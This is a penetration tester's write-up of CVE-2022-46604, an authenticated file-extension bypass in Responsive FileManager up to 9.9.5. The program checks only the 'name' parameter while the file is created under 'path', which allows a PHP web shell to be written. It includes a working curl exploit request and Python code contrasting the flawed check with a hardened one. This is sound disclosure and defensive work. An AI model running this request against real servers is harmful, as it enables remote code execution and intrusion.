File extension bypass in Responsive FileManager ≤9.9.5 leading to RCE (authenticated)

Konstantin Burov
Dec 2, 2022


On one of the penetration testing projects, I came across an old version of Responsive FileManager — 9.9.2. All public exploits were for version 9.14 and below, but they do not work on this version, so I had to find a new one. In this short write-up you will learn how to use it.

The vulnerability was tested on versions 9.9.2 and 9.9.5. I did not find any mention of this vulnerability on the web or in the official repository on github.com. All I found was one line about fixing the vulnerability in version 9.9.6, with thanks to securitum.pl, in the changelog.

When creating a file, three parameters are passed to RFM: path, path_thumb, and new_content, e.g.

path=1.txt&path_thumb=../thumbs/.txt&name=1.txt&new_content=sometext

You can use curl to create a text file:

When you try to create a file with a restricted extension such as .php, the request is rejected. However, RFM validates only the name parameter and not path, which is the actual file name (including its directory). Change path to a .php file name, supply suitable content, and the file is written as PHP, which is what yields the shell.

Like this:

There is no need for a PoC or a functional exploit for this bug; a single curl request is enough:

curl -s "http://<HOSTNAME>/filemanager/execute.php?action=create_file" \
-d "path=cmd.php&path_thumb=../thumbs/.txt&name=1.txt&new_content=<URL_ENCODED_CONTENT>" -H "Cookie: PHPSESSID=<VALID_COOKIE>"

To fix this bug, update RFM to version 9.9.6 or later.
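The root cause is a check applied to a cosmetic parameter (name) while a different parameter (path) decides what is actually written. The following is an added illustration written for this write-up, not RFM's own code: a model of the flawed check next to a hardened one that validates the real destination and also confines it to the upload root (the upload_root value and the blocked-extension list are assumptions).

```python
import os
import posixpath
from urllib.parse import parse_qs

# Assumed deny-list; RFM's real configuration may differ.
BLOCKED_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar", "htaccess"}


def parse_body(body: str) -> dict:
    """Turn an x-www-form-urlencoded request body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def extension_of(filename: str) -> str:
    """Lower-cased final extension of the basename, or '' if none."""
    base = posixpath.basename(filename)
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def vulnerable_check(params: dict) -> bool:
    """Model of the <= 9.9.5 behaviour: only `name` is inspected,
    although the file is created under `path`."""
    return extension_of(params.get("name", "")) not in BLOCKED_EXTENSIONS


def hardened_check(params: dict, upload_root: str = "/var/www/source") -> bool:
    """Validate the destination that will be written, not a side parameter."""
    path = params.get("path", "")
    name = params.get("name", "")
    base = posixpath.basename(path)
    # `name` must describe the file that `path` points at; a mismatch is rejected.
    if not base or base != name:
        return False
    # Inspect every dotted component so 'x.php.txt' is caught as well.
    if any(part in BLOCKED_EXTENSIONS for part in base.lower().split(".")[1:]):
        return False
    # Resolve the destination and refuse anything outside the upload root.
    dest = os.path.normpath(os.path.join(upload_root, path))
    return dest.startswith(upload_root + os.sep)
```

Feeding the two request bodies from this post through both checks shows the first accepting the .php write and the second rejecting it.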

That’s all, thanks for reading!

Update: CVE-2022-46604 has been assigned.
